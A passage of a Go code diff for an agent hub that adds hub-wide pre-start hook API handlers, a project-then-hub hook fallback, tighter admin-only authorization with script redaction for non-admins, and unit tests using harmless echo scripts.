 			hook, hubErr = s.store.GetActiveHubPreStartHook(ctx)
-			if hubErr != nil && !errors.Is(hubErr, store.ErrNotFound) {
-				s.agentLifecycleLog.Warn("failed to resolve hub pre-start hook", "error", hubErr)
+			if hubErr != nil {
+				if !errors.Is(hubErr, store.ErrNotFound) {
+					s.agentLifecycleLog.Warn("failed to resolve hub pre-start hook", "error", hubErr)
+				}
+				hook = nil
 			}
+		default:
+			// 3. Ambiguous project lookup failure — stage nothing.
+			s.agentLifecycleLog.Warn("failed to resolve project pre-start hook; skipping hook staging",
+				"project_id", project.ID, "error", hookErr)
+			hook = nil
 		}
 
 		if hook != nil {

--- a/pkg/hub/handlers_agent_create_helpers.go
+++ b/pkg/hub/handlers_agent_create_helpers.go
@@ -262,16 +262,36 @@ func (s *Server) populateAgentConfig(ctx context.Context, agent *store.Agent, pr
 		}
 	}
 
-	// Stamp project pre-start hook for broker delivery.
-	// Resolve the active hook for the project and inline its script content into
-	// AppliedConfig so the broker can stage it without an extra Hub round-trip.
-	// Mirrors the HarnessConfigID stamping pattern above.
+	// Stamp the pre-start hook for broker delivery.
+	// Resolve the active hook and inline its script content into AppliedConfig
+	// so the broker can stage it without an extra Hub round-trip. Mirrors the
+	// HarnessConfigID stamping pattern above.
+	//
+	// Resolution is a two-step fallback (see
+	// .design/project-prestart-hooks-extensions.md section 1):
+	//   1. The project's active hook wins outright.
+	//   2. Otherwise the hub-wide active hook applies, if any.
+	//   3. Neither → no script staged.
+	// Either way the broker stages a single file (30-project-custom) and
+	// AppliedConfig.ProjectPreStartHookID records which hook it came from, so
+	// no scope-specific fields are needed downstream.
 	if project != nil && agent.AppliedConfig.ProjectPreStartHookID == "" {
+		// 1. Project-scoped hook (takes precedence).
 		hook, hookErr := s.store.GetActiveProjectPreStartHook(ctx, project.ID)
 		if hookErr != nil && !errors.Is(hookErr, store.ErrNotFound) {
 			s.agentLifecycleLog.Warn("failed to resolve project pre-start hook",
 				"project_id", project.ID, "error", hookErr)
 		}
+
+		// 2. Hub-scoped fallback, only when no project hook was found.
+		if hook == nil {
+			var hubErr error
+			hook, hubErr = s.store.GetActiveHubPreStartHook(ctx)
+			if hubErr != nil && !errors.Is(hubErr, store.ErrNotFound) {
+				s.agentLifecycleLog.Warn("failed to resolve hub pre-start hook", "error", hubErr)
+			}
+		}
+
 		if hook != nil {
 			agent.AppliedConfig.ProjectPreStartHookID = hook.ID
 			agent.AppliedConfig.ProjectPreStartHookScript = hook.Script

--- a/pkg/hub/handlers_agent_create_helpers_test.go
+++ b/pkg/hub/handlers_agent_create_helpers_test.go
@@ -19,6 +19,7 @@ package hub
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"os"
 	"path/filepath"
 	"strings"
@@ -537,6 +538,97 @@ func TestPopulateAgentConfig_PreStartHook_ArchivedProjectHookFallsBackToHub(t *t
 
 	assert.Equal(t, hubHook.ID, agent.AppliedConfig.ProjectPreStartHookID)
 	assert.Equal(t, "#!/bin/sh\necho hub\n", agent.AppliedConfig.ProjectPreStartHookScript)
+}
+
+// failingProjectHookStore wraps a store and makes the project-scoped active
+// hook lookup fail with a non-ErrNotFound error, simulating a DB blip or a
+// duplicate-row `.Only()` failure.
+type failingProjectHookStore struct {
+	store.Store
+	err error
+}
+
+func (f *failingProjectHookStore) GetActiveProjectPreStartHook(context.Context, string) (*store.ProjectPreStartHook, error) {
+	return nil, f.err
+}
+
+// A project hook lookup that fails for a reason other than "not found" is
+// ambiguous — the project may have an override we simply could not read. In
+// that case nothing is staged; falling back to the hub hook would run the wrong
+// script in a project that deliberately overrode it.
+func TestPopulateAgentConfig_PreStartHook_ProjectLookupErrorStagesNothing(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	_, err := s.CreateHubPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		Scope:  store.PreStartHookScopeHub,
+		Name:   "Hub baseline",
+		Slug:   "hub-baseline",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	srv.store = &failingProjectHookStore{Store: s, err: errors.New("database is locked")}
+
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Empty(t, agent.AppliedConfig.ProjectPreStartHookID,
+		"an ambiguous project lookup error must not fall back to the hub hook")
+	assert.Empty(t, agent.AppliedConfig.ProjectPreStartHookScript)
+}
+
+// AC8: creating a second project hook archives the first, and once the project
+// has no hooks left the hub fallback resumes. The archived hook must never be
+// staged at any point.
+func TestPopulateAgentConfig_ProjectHookArchivedBySecondCreate_FallsBackToHub(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	hubHook, err := s.CreateHubPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		Scope:  store.PreStartHookScopeHub,
+		Name:   "Hub baseline",
+		Slug:   "hub-baseline",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	first, err := s.CreateProjectPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		ProjectID: project.ID,
+		Name:      "First project hook",
+		Slug:      "first-project-hook",
+		Script:    "#!/bin/sh\necho first\n",
+	})
+	require.NoError(t, err)
+
+	// Creating a second hook implicitly archives the first.
+	second, err := s.CreateProjectPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		ProjectID: project.ID,
+		Name:      "Second project hook",
+		Slug:      "second-project-hook",
+		Script:    "#!/bin/sh\necho second\n",
+	})
+	require.NoError(t, err)
+
+	reloadedFirst, err := s.GetProjectPreStartHook(t.Context(), first.ID, project.ID)
+	require.NoError(t, err)
+	require.Equal(t, store.ProjectPreStartHookStatusArchived, reloadedFirst.Status)
+
+	// The live project hook wins; the archived one is never staged.
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+	assert.Equal(t, second.ID, agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho second\n", agent.AppliedConfig.ProjectPreStartHookScript)
+
+	// Remove the project's hooks entirely: the archived one first, then the
+	// active one (allowed once it is the last hook in the project scope).
+	require.NoError(t, s.DeleteProjectPreStartHook(t.Context(), first.ID, project.ID))
+	require.NoError(t, s.DeleteProjectPreStartHook(t.Context(), second.ID, project.ID))
+
+	// With no project hook left, the hub fallback resumes.
+	next := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), next, project, nil)
+	assert.Equal(t, hubHook.ID, next.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho hub\n", next.AppliedConfig.ProjectPreStartHookScript)
+	assert.NotContains(t, next.AppliedConfig.ProjectPreStartHookScript, "echo first")
 }
 
 // An explicitly pre-stamped hook ID is never overwritten by either scope.

--- a/pkg/hub/handlers_agent_create_helpers_test.go
+++ b/pkg/hub/handlers_agent_create_helpers_test.go
@@ -21,6 +21,7 @@ import (
 	"encoding/json"
 	"os"
 	"path/filepath"
+	"strings"
 	"testing"
 
 	"github.com/GoogleCloudPlatform/scion/pkg/api"
@@ -396,4 +397,166 @@ func extractSkillURIs(refs []api.SkillReference) []string {
 		out = append(out, r.URI)
 	}
 	return out
+}
+
+// =============================================================================
+// Pre-start hook stamping — project hook, hub fallback, neither
+// =============================================================================
+
+// setupPreStartHookStampingTest returns a server, store, and a persisted
+// project for pre-start hook stamping assertions.
+func setupPreStartHookStampingTest(t *testing.T) (*Server, store.Store, *store.Project) {
+	t.Helper()
+	t.Setenv("HOME", t.TempDir())
+
+	srv, s := testServer(t)
+	project := &store.Project{
+		ID:         tid("psh-stamp-" + t.Name()),
+		Name:       "PSH Stamping Project",
+		Slug:       "psh-stamp-" + strings.ToLower(t.Name()),
+		Visibility: "private",
+		OwnerID:    "dev@localhost",
+	}
+	require.NoError(t, s.CreateProject(t.Context(), project))
+	return srv, s, project
+}
+
+// newStampingAgent returns an agent with a fixed workspace so that
+// populateAgentConfig does not depend on hub-managed path resolution.
+func newStampingAgent() *store.Agent {
+	return &store.Agent{
+		ID: "agent-psh-stamp",
+		AppliedConfig: &store.AgentAppliedConfig{
+			Workspace: "/tmp/workspace",
+		},
+	}
+}
+
+// The hub hook is the fallback when the project has no active hook.
+func TestPopulateAgentConfig_PreStartHook_HubFallback(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	hubHook, err := s.CreateHubPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		Scope:  store.PreStartHookScopeHub,
+		Name:   "Hub baseline",
+		Slug:   "hub-baseline",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Equal(t, hubHook.ID, agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho hub\n", agent.AppliedConfig.ProjectPreStartHookScript)
+}
+
+// A project hook overrides the hub hook entirely — only one hook ever runs.
+func TestPopulateAgentConfig_PreStartHook_ProjectOverridesHub(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	_, err := s.CreateHubPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		Scope:  store.PreStartHookScopeHub,
+		Name:   "Hub baseline",
+		Slug:   "hub-baseline",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	projectHook, err := s.CreateProjectPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		ProjectID: project.ID,
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\necho project\n",
+	})
+	require.NoError(t, err)
+
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Equal(t, projectHook.ID, agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho project\n", agent.AppliedConfig.ProjectPreStartHookScript)
+	assert.NotContains(t, agent.AppliedConfig.ProjectPreStartHookScript, "echo hub")
+}
+
+// Only a project hook exists — unchanged v1 behaviour.
+func TestPopulateAgentConfig_PreStartHook_ProjectOnly(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	projectHook, err := s.CreateProjectPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		ProjectID: project.ID,
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\necho project\n",
+	})
+	require.NoError(t, err)
+
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Equal(t, projectHook.ID, agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho project\n", agent.AppliedConfig.ProjectPreStartHookScript)
+}
+
+// Regression: no hooks at any scope means nothing is staged.
+func TestPopulateAgentConfig_PreStartHook_NoneStagesNothing(t *testing.T) {
+	srv, _, project := setupPreStartHookStampingTest(t)
+
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Empty(t, agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Empty(t, agent.AppliedConfig.ProjectPreStartHookScript)
+}
+
+// An archived project hook must not shadow the active hub hook.
+func TestPopulateAgentConfig_PreStartHook_ArchivedProjectHookFallsBackToHub(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	projectHook, err := s.CreateProjectPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		ProjectID: project.ID,
+		Name:      "Project hook",
+		Slug:      "project-hook",
+		Script:    "#!/bin/sh\necho project\n",
+	})
+	require.NoError(t, err)
+
+	hubHook, err := s.CreateHubPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		Scope:  store.PreStartHookScopeHub,
+		Name:   "Hub baseline",
+		Slug:   "hub-baseline",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	// Deleting the only project hook leaves the project with no active hook.
+	require.NoError(t, s.DeleteProjectPreStartHook(t.Context(), projectHook.ID, project.ID))
+
+	agent := newStampingAgent()
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Equal(t, hubHook.ID, agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho hub\n", agent.AppliedConfig.ProjectPreStartHookScript)
+}
+
+// An explicitly pre-stamped hook ID is never overwritten by either scope.
+func TestPopulateAgentConfig_PreStartHook_PreStampedIDPreserved(t *testing.T) {
+	srv, s, project := setupPreStartHookStampingTest(t)
+
+	_, err := s.CreateHubPreStartHook(t.Context(), &store.ProjectPreStartHook{
+		Scope:  store.PreStartHookScopeHub,
+		Name:   "Hub baseline",
+		Slug:   "hub-baseline",
+		Script: "#!/bin/sh\necho hub\n",
+	})
+	require.NoError(t, err)
+
+	agent := newStampingAgent()
+	agent.AppliedConfig.ProjectPreStartHookID = "preset-hook-id"
+	agent.AppliedConfig.ProjectPreStartHookScript = "#!/bin/sh\necho preset\n"
+
+	srv.populateAgentConfig(t.Context(), agent, project, nil)
+
+	assert.Equal(t, "preset-hook-id", agent.AppliedConfig.ProjectPreStartHookID)
+	assert.Equal(t, "#!/bin/sh\necho preset\n", agent.AppliedConfig.ProjectPreStartHookScript)
 }

--- a/pkg/hub/handlers_projects_core.go
+++ b/pkg/hub/handlers_projects_core.go
@@ -1444,7 +1444,7 @@ func (s *Server) handleProjectRoutes(w http.ResponseWriter, r *http.Request) {
 	}
 
 	// Check for nested /pre-start-hooks path
-	if strings.HasPrefix(subPath, "pre-start-hooks") {
+	if subPath == "pre-start-hooks" || strings.HasPrefix(subPath, "pre-start-hooks/") {
 		pshPath := strings.TrimPrefix(subPath, "pre-start-hooks")
 		pshPath = strings.TrimPrefix(pshPath, "/")
 		pshPath = strings.TrimSuffix(pshPath, "/")

--- a/pkg/hub/hub_pre_start_hook_handlers.go
+++ b/pkg/hub/hub_pre_start_hook_handlers.go
@@ -1,0 +1,281 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package hub
+
+import (
+	"errors"
+	"net/http"
+	"strings"
+
+	"github.com/GoogleCloudPlatform/scion/pkg/api"
+	"github.com/GoogleCloudPlatform/scion/pkg/store"
+)
+
+// hubPreStartHookBasePath is the top-level route prefix for hub-scoped hooks.
+const hubPreStartHookBasePath = "/api/v1/pre-start-hooks/"
+
+// Authorization model for hub-scoped pre-start hooks:
+//
+//   - Read (GET list, GET detail): any authenticated identity. Project owners
+//     who are not hub admins need this to render the "Inherited from hub"
+//     indicator on the project settings page. This mirrors the harness-config
+//     GET authorization model.
+//   - Mutations (POST, PUT, DELETE, POST .../activate): hub admin only. A hub
+//     hook runs on every agent whose project has no project-scoped hook, so
+//     changing it is a hub-admin concern.
+//
+// Request/response shapes are shared with the project-scoped handlers
+// (CreateProjectPreStartHookRequest, UpdateProjectPreStartHookRequest,
+// ListProjectPreStartHooksResponse) — the payloads are identical.
+
+// handleHubPreStartHooks handles GET (list) and POST (create) on
+// /api/v1/pre-start-hooks.
+func (s *Server) handleHubPreStartHooks(w http.ResponseWriter, r *http.Request) {
+	ctx := r.Context()
+
+	switch r.Method {
+	case http.MethodGet:
+		if GetIdentityFromContext(ctx) == nil {
+			Unauthorized(w)
+			return
+		}
+
+		hooks, err := s.store.ListHubPreStartHooks(ctx)
+		if err != nil {
+			writeErrorFromErr(w, err, "")
+			return
+		}
+		writeJSON(w, http.StatusOK, &ListProjectPreStartHooksResponse{Hooks: hooks})
+
+	case http.MethodPost:
+		identity, ok := s.requireAdmin(w, r)
+		if !ok {
+			return
+		}
+
+		var req CreateProjectPreStartHookRequest
+		if err := readJSON(r, &req); err != nil {
+			BadRequest(w, "Invalid request body: "+err.Error())
+			return
+		}
+		if req.Name == "" {
+			ValidationError(w, "name is required", nil)
+			return
+		}
+		if req.Script == "" {
+			ValidationError(w, "script is required", nil)
+			return
+		}
+		if len(req.Script) > projectPreStartHookScriptMaxBytes {
+			BadRequest(w, "script exceeds 64 KB size limit")
+			return
+		}
+
+		// Always run through Slugify so a caller-supplied slug is normalised
+		// (lowercased, special chars stripped) exactly as a name-derived slug is.
+		slug := req.Slug
+		if slug == "" {
+			slug = api.Slugify(req.Name)
+		} else {
+			slug = api.Slugify(slug)
+		}
+		if slug == "" {
+			ValidationError(w, "slug is required (or provide a name that can be slugified)", nil)
+			return
+		}
+
+		createdBy := identity.Email()
+
+		hook, err := s.store.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+			Scope:       store.PreStartHookScopeHub,
+			Name:        req.Name,
+			Slug:        slug,
+			Description: req.Description,
+			Script:      req.Script,
+			CreatedBy:   createdBy,
+			UpdatedBy:   createdBy,
+		})
+		if err != nil {
+			if errors.Is(err, store.ErrAlreadyExists) {
+				Conflict(w, "a hub hook with this slug already exists")
+				return
+			}
+			writeErrorFromErr(w, err, "")
+			return
+		}
+		writeJSON(w, http.StatusCreated, hook)
+
+	default:
+		MethodNotAllowed(w)
+	}
+}
+
+// handleHubPreStartHookByID handles requests on
+// /api/v1/pre-start-hooks/{hookId} and
+// /api/v1/pre-start-hooks/{hookId}/activate.
+func (s *Server) handleHubPreStartHookByID(w http.ResponseWriter, r *http.Request) {
+	ctx := r.Context()
+
+	path := strings.TrimPrefix(r.URL.Path, hubPreStartHookBasePath)
+	path = strings.TrimSuffix(path, "/")
+	if path == "" {
+		NotFound(w, "HubPreStartHook")
+		return
+	}
+
+	parts := strings.SplitN(path, "/", 2)
+	hookID := parts[0]
+	action := ""
+	if len(parts) > 1 {
+		action = parts[1]
+	}
+	if hookID == "" {
+		NotFound(w, "HubPreStartHook")
+		return
+	}
+
+	switch action {
+	case "":
+		// fall through to the method switch below
+	case "activate":
+		if r.Method != http.MethodPost {
+			MethodNotAllowed(w)
+			return
+		}
+		if _, ok := s.requireAdmin(w, r); !ok {
+			return
+		}
+
+		hook, err := s.store.ActivateHubPreStartHook(ctx, hookID)
+		if err != nil {
+			if errors.Is(err, store.ErrNotFound) {
+				NotFound(w, "HubPreStartHook")
+				return
+			}
+			writeErrorFromErr(w, err, "")
+			return
+		}
+		writeJSON(w, http.StatusOK, hook)
+		return
+	default:
+		NotFound(w, "HubPreStartHook")
+		return
+	}
+
+	switch r.Method {
+	case http.MethodGet:
+		if GetIdentityFromContext(ctx) == nil {
+			Unauthorized(w)
+			return
+		}
+
+		hook, err := s.store.GetHubPreStartHook(ctx, hookID)
+		if err != nil {
+			if errors.Is(err, store.ErrNotFound) {
+				NotFound(w, "HubPreStartHook")
+				return
+			}
+			writeErrorFromErr(w, err, "")
+			return
+		}
+		writeJSON(w, http.StatusOK, hook)
+
+	case http.MethodPut:
+		identity, ok := s.requireAdmin(w, r)
+		if !ok {
+			return
+		}
+
+		var req UpdateProjectPreStartHookRequest
+		if err := readJSON(r, &req); err != nil {
+			BadRequest(w, "Invalid request body: "+err.Error())
+			return
+		}
+		if req.Script != nil && len(*req.Script) > projectPreStartHookScriptMaxBytes {
+			BadRequest(w, "script exceeds 64 KB size limit")
+			return
+		}
+
+		existing, err := s.store.GetHubPreStartHook(ctx, hookID)
+		if err != nil {
+			if errors.Is(err, store.ErrNotFound) {
+				NotFound(w, "HubPreStartHook")
+				return
+			}
+			writeErrorFromErr(w, err, "")
+			return
+		}
+
+		// Apply partial updates.
+		updated := &store.ProjectPreStartHook{
+			ID:    existing.ID,
+			Scope: store.PreStartHookScopeHub,
+		}
+		if req.Name != nil {
+			updated.Name = *req.Name
+		} else {
+			updated.Name = existing.Name
+		}
+		if req.Description != nil {
+			updated.Description = *req.Description
+		} else {
+			updated.Description = existing.Description
+		}
+		if req.Script != nil {
+			updated.Script = *req.Script
+		} else {
+			updated.Script = existing.Script
+		}
+		updated.UpdatedBy = identity.Email()
+
+		if updated.Script == "" {
+			ValidationError(w, "script cannot be set to empty", nil)
+			return
+		}
+
+		hook, err := s.store.UpdateHubPreStartHook(ctx, updated)
+		if err != nil {
+			if errors.Is(err, store.ErrNotFound) {
+				NotFound(w, "HubPreStartHook")
+				return
+			}
+			writeErrorFromErr(w, err, "")
+			return
+		}
+		writeJSON(w, http.StatusOK, hook)
+
+	case http.MethodDelete:
+		if _, ok := s.requireAdmin(w, r); !ok {
+			return
+		}
+
+		if err := s.store.DeleteHubPreStartHook(ctx, hookID); err != nil {
+			if errors.Is(err, store.ErrNotFound) {
+				NotFound(w, "HubPreStartHook")
+				return
+			}
+			if errors.Is(err, store.ErrInvalidInput) {
+				BadRequest(w, "cannot delete an active hook while other hub hooks exist; activate another hook first, then delete this one")
+				return
+			}
+			writeErrorFromErr(w, err, "")
+			return
+		}
+		w.WriteHeader(http.StatusNoContent)
+
+	default:
+		MethodNotAllowed(w)
+	}
+}

--- a/pkg/hub/hub_pre_start_hook_handlers.go
+++ b/pkg/hub/hub_pre_start_hook_handlers.go
@@ -17,6 +17,7 @@ package hub
 import (
 	"errors"
 	"net/http"
+	"strconv"
 	"strings"
 
 	"github.com/GoogleCloudPlatform/scion/pkg/api"
@@ -28,17 +29,70 @@ const hubPreStartHookBasePath = "/api/v1/pre-start-hooks/"
 
 // Authorization model for hub-scoped pre-start hooks:
 //
-//   - Read (GET list, GET detail): any authenticated identity. Project owners
+//   - Read (GET list, GET detail): any authenticated *user*. Project owners
 //     who are not hub admins need this to render the "Inherited from hub"
-//     indicator on the project settings page. This mirrors the harness-config
-//     GET authorization model.
-//   - Mutations (POST, PUT, DELETE, POST .../activate): hub admin only. A hub
-//     hook runs on every agent whose project has no project-scoped hook, so
-//     changing it is a hub-admin concern.
+//     indicator on the project settings page. Agent identities are rejected —
+//     an agent has no reason to enumerate hub-wide hook policy. Non-admin
+//     callers get the hook metadata with the script body stripped from list
+//     responses (hub scripts can carry infrastructure secrets).
+//   - Mutations (POST, PUT, DELETE, POST .../activate): hub admin only, and
+//     never via a project-scoped User Access Token. A hub hook runs as root on
+//     every agent whose project has no project-scoped hook, so changing it is a
+//     hub-admin concern. See requireHubAdmin.
 //
 // Request/response shapes are shared with the project-scoped handlers
 // (CreateProjectPreStartHookRequest, UpdateProjectPreStartHookRequest,
 // ListProjectPreStartHooksResponse) — the payloads are identical.
+
+// requireHubAdmin authorizes a hub-wide mutation. It is stricter than
+// requireAdmin: in addition to demanding the admin role it rejects
+// ScopedUserIdentity (a User Access Token). A UAT embeds the minting user's
+// role, so an admin-minted project-scoped CI token would otherwise pass a plain
+// role check and be able to install a hub-wide hook script that executes as
+// root inside every agent container. UATs are confined to a single project and
+// must never affect hub-wide policy.
+func (s *Server) requireHubAdmin(w http.ResponseWriter, r *http.Request) (UserIdentity, bool) {
+	identity := GetUserIdentityFromContext(r.Context())
+	if identity == nil {
+		writeError(w, http.StatusUnauthorized, "unauthorized", "Authentication required", nil)
+		return nil, false
+	}
+	if identity.Role() != store.UserRoleAdmin {
+		Forbidden(w)
+		return nil, false
+	}
+	if _, scoped := identity.(*ScopedUserIdentity); scoped {
+		Forbidden(w)
+		return nil, false
+	}
+	return identity, true
+}
+
+// requireHubHookReader authorizes a hub hook read. Any authenticated user
+// identity qualifies (including UAT-scoped ones — reading hub hook metadata is
+// needed to render the inherited-hook banner); agent identities do not.
+// The second return value reports whether the caller is a full hub admin,
+// which controls whether script bodies are included in list responses.
+func (s *Server) requireHubHookReader(w http.ResponseWriter, r *http.Request) (UserIdentity, bool) {
+	identity := GetUserIdentityFromContext(r.Context())
+	if identity == nil {
+		Unauthorized(w)
+		return nil, false
+	}
+	return identity, true
+}
+
+// isHubAdminIdentity reports whether the identity may see hub hook script
+// bodies in list responses.
+func isHubAdminIdentity(identity UserIdentity) bool {
+	if identity == nil {
+		return false
+	}
+	if _, scoped := identity.(*ScopedUserIdentity); scoped {
+		return false
+	}
+	return identity.Role() == store.UserRoleAdmin
+}
 
 // handleHubPreStartHooks handles GET (list) and POST (create) on
 // /api/v1/pre-start-hooks.
@@ -47,23 +101,72 @@ func (s *Server) handleHubPreStartHooks(w http.ResponseWriter, r *http.Request) 
 
 	switch r.Method {
 	case http.MethodGet:
-		if GetIdentityFromContext(ctx) == nil {
-			Unauthorized(w)
-			return
-		}
-
-		hooks, err := s.store.ListHubPreStartHooks(ctx)
-		if err != nil {
-			writeErrorFromErr(w, err, "")
-			return
-		}
-		writeJSON(w, http.StatusOK, &ListProjectPreStartHooksResponse{Hooks: hooks})
-
-	case http.MethodPost:
-		identity, ok := s.requireAdmin(w, r)
+		identity, ok := s.requireHubHookReader(w, r)
 		if !ok {
 			return
 		}
+
+		query := r.URL.Query()
+
+		var hooks []*store.ProjectPreStartHook
+		if query.Get("status") == store.ProjectPreStartHookStatusActive {
+			// The project settings page asks for ?status=active&limit=1 to
+			// render the inherited-hook banner. Serve that from the dedicated
+			// single-row lookup; "no active hub hook" is an empty list, not 404.
+			hook, err := s.store.GetActiveHubPreStartHook(ctx)
+			switch {
+			case err == nil:
+				hooks = []*store.ProjectPreStartHook{hook}
+			case errors.Is(err, store.ErrNotFound):
+				hooks = nil
+			default:
+				writeErrorFromErr(w, err, "")
+				return
+			}
+		} else {
+			var err error
+			hooks, err = s.store.ListHubPreStartHooks(ctx)
+			if err != nil {
+				writeErrorFromErr(w, err, "")
+				return
+			}
+		}
+
+		if raw := query.Get("limit"); raw != "" {
+			limit, err := strconv.Atoi(raw)
+			if err != nil || limit < 0 {
+				BadRequest(w, "limit must be a non-negative integer")
+				return
+			}
+			if limit < len(hooks) {
+				hooks = hooks[:limit]
+			}
+		}
+
+		// Hub hook scripts may embed infrastructure secrets. Non-admin callers
+		// only need {id, name, slug, status, scope} for the inherited banner.
+		if !isHubAdminIdentity(identity) {
+			redacted := make([]*store.ProjectPreStartHook, 0, len(hooks))
+			for _, h := range hooks {
+				if h == nil {
+					continue
+				}
+				copied := *h
+				copied.Script = ""
+				redacted = append(redacted, &copied)
+			}
+			hooks = redacted
+		}
+
+		writeJSON(w, http.StatusOK, &ListProjectPreStartHooksResponse{Hooks: hooks})
+
+	case http.MethodPost:
+		identity, ok := s.requireHubAdmin(w, r)
+		if !ok {
+			return
+		}
+
+		r.Body = http.MaxBytesReader(w, r.Body, projectPreStartHookScriptMaxBytes+4096)
 
 		var req CreateProjectPreStartHookRequest
 		if err := readJSON(r, &req); err != nil {
@@ -154,7 +257,7 @@ func (s *Server) handleHubPreStartHookByID(w http.ResponseWriter, r *http.Reques
 			MethodNotAllowed(w)
 			return
 		}
-		if _, ok := s.requireAdmin(w, r); !ok {
+		if _, ok := s.requireHubAdmin(w, r); !ok {
 			return
 		}
 
@@ -176,8 +279,7 @@ func (s *Server) handleHubPreStartHookByID(w http.ResponseWriter, r *http.Reques
 
 	switch r.Method {
 	case http.MethodGet:
-		if GetIdentityFromContext(ctx) == nil {
-			Unauthorized(w)
+		if _, ok := s.requireHubHookReader(w, r); !ok {
 			return
 		}
 
@@ -193,10 +295,12 @@ func (s *Server) handleHubPreStartHookByID(w http.ResponseWriter, r *http.Reques
 		writeJSON(w, http.StatusOK, hook)
 
 	case http.MethodPut:
-		identity, ok := s.requireAdmin(w, r)
+		identity, ok := s.requireHubAdmin(w, r)
 		if !ok {
 			return
 		}
+
+		r.Body = http.MaxBytesReader(w, r.Body, projectPreStartHookScriptMaxBytes+4096)
 
 		var req UpdateProjectPreStartHookRequest
 		if err := readJSON(r, &req); err != nil {
@@ -257,7 +361,7 @@ func (s *Server) handleHubPreStartHookByID(w http.ResponseWriter, r *http.Reques
 		writeJSON(w, http.StatusOK, hook)
 
 	case http.MethodDelete:
-		if _, ok := s.requireAdmin(w, r); !ok {
+		if _, ok := s.requireHubAdmin(w, r); !ok {
 			return
 		}
 

--- a/pkg/hub/hub_pre_start_hook_handlers_test.go
+++ b/pkg/hub/hub_pre_start_hook_handlers_test.go
@@ -17,8 +17,10 @@
 package hub
 
 import (
+	"bytes"
 	"encoding/json"
 	"net/http"
+	"net/http/httptest"
 	"strings"
 	"testing"
 
@@ -42,6 +44,55 @@ func createNonAdminUserForHubPSH(t *testing.T, s store.Store) *store.User {
 	}
 	require.NoError(t, s.CreateUser(t.Context(), user))
 	return user
+}
+
+// createAdminUserForHubPSH creates an authenticated hub admin. Used together
+// with uatTokenForUser to assert that an admin-minted, project-scoped User
+// Access Token still cannot mutate hub-wide hook policy.
+func createAdminUserForHubPSH(t *testing.T, s store.Store) *store.User {
+	t.Helper()
+	user := &store.User{
+		ID:          tid("hub-psh-admin-" + t.Name()),
+		Email:       "admin-" + strings.ToLower(t.Name()) + "@example.com",
+		DisplayName: "Hub Admin",
+		Role:        store.UserRoleAdmin,
+		Status:      "active",
+	}
+	require.NoError(t, s.CreateUser(t.Context(), user))
+	return user
+}
+
+// uatTokenForUser mints a real project-scoped User Access Token for the given
+// user, returning the plaintext token.
+func uatTokenForUser(t *testing.T, srv *Server, s store.Store, user *store.User) string {
+	t.Helper()
+	project := createTestProjectForPSH(t, s)
+	token, _, err := srv.uatService.CreateToken(
+		t.Context(), user.ID, "ci-token", project.ID, []string{store.UATScopeAgentManage}, nil,
+	)
+	require.NoError(t, err)
+	return token
+}
+
+// doRequestWithToken performs an HTTP request using an arbitrary bearer token.
+func doRequestWithToken(t *testing.T, srv *Server, token, method, path string, body interface{}) *httptest.ResponseRecorder {
+	t.Helper()
+	var bodyBytes []byte
+	if body != nil {
+		var err error
+		bodyBytes, err = json.Marshal(body)
+		require.NoError(t, err)
+	}
+
+	req := httptest.NewRequest(method, path, bytes.NewReader(bodyBytes))
+	if body != nil {
